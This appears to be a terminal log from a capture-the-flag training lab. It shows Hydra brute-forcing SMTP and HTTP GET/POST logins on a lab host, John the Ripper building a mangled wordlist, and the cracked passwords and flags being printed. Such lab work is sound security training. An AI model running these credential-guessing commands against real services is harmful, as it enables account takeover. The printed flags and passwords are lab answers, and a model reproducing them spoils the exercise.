total 288
drwxr-xr-x 2 root root   4096 Sep  9 13:59 .
drwxr-xr-x 5 root root   4096 Sep  9 13:48 ..
-rw-r--r-- 1 root root   1078 Sep  9 13:59 clinic.lst
-rw-r--r-- 1 root root 278600 Sep  9 13:59 dict.lst
root@ip-10-10-12-138:~/Desktop/tm# hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://10.10.173.4:25 -v
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-09-09 13:59:34
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21000 login tries (l:1/p:21000), ~1313 tries per task
[DATA] attacking smtp://10.10.173.4:25/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[25][smtp] host: 10.10.173.4   login: pittman@clinic.thmredteam.com   password: !multidisciplinary00
[STATUS] attack finished for 10.10.173.4 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-09-09 13:59:49
root@ip-10-10-12-138:~/Desktop/tm# 

root@ip-10-10-12-138:~/Desktop/tm# hydra -l phillips -P clinic.lst 10.10.173.4 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-09-09 14:03:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task
[DATA] attacking http-get-form://10.10.173.4:80//login-get/index.php:username=^USER^&password=^PASS^:S=logout.php
[80][http-get-form] host: 10.10.173.4   login: phillips   password: Paracetamol
[STATUS] attack finished for 10.10.173.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-09-09 14:03:11
root@ip-10-10-12-138:~/Desktop/tm# 

http://10.10.173.4/login-get/flag.php
You have sucessfully logged in!
THM{33c5d4954da881814420f3ba39772644}

root@ip-10-10-12-138:~/Desktop/tm# john --wordlist=clinic.lst --rules=Single-Extra --stdout > dict2.lst
Using default input encoding: UTF-8
Press 'q' or Ctrl-C to abort, almost any other key for status
537026p 0:00:00:00 100.00% (2022-09-09 14:07) 4882Kp/s multidisciplina
root@ip-10-10-12-138:~/Desktop/tm# ls -la
total 6772
drwxr-xr-x 2 root root    4096 Sep  9 14:07 .
drwxr-xr-x 5 root root    4096 Sep  9 13:48 ..
-rw-r--r-- 1 root root    1078 Sep  9 13:59 clinic.lst
-rw-r--r-- 1 root root 6638061 Sep  9 14:07 dict2.lst
-rw-r--r-- 1 root root  278600 Sep  9 13:59 dict.lst
root@ip-10-10-12-138:~/Desktop/tm# hydra -l burgess -P dict2.lst 10.10.173.4 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-09-09 14:07:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 537026 login tries (l:1/p:537026), ~33565 tries per task
[DATA] attacking http-post-form://10.10.173.4:80//login-post/index.php:username=^USER^&password=^PASS^:S=logout.php
[STATUS] 1169.00 tries/min, 1169 tries in 00:01h, 535857 to do in 07:39h, 16 active
[80][http-post-form] host: 10.10.173.4   login: burgess   password: OxytocinnicotyxO
[STATUS] attack finished for 10.10.173.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-09-09 14:09:34
root@ip-10-10-12-138:~/Desktop/tm# ^C
root@ip-10-10-12-138:~/Desktop/tm# 
http://10.10.173.4/login-post/flag.php
You have sucessfully logged in!
THM{f8e3750cc0ccbb863f2706a3b2933227}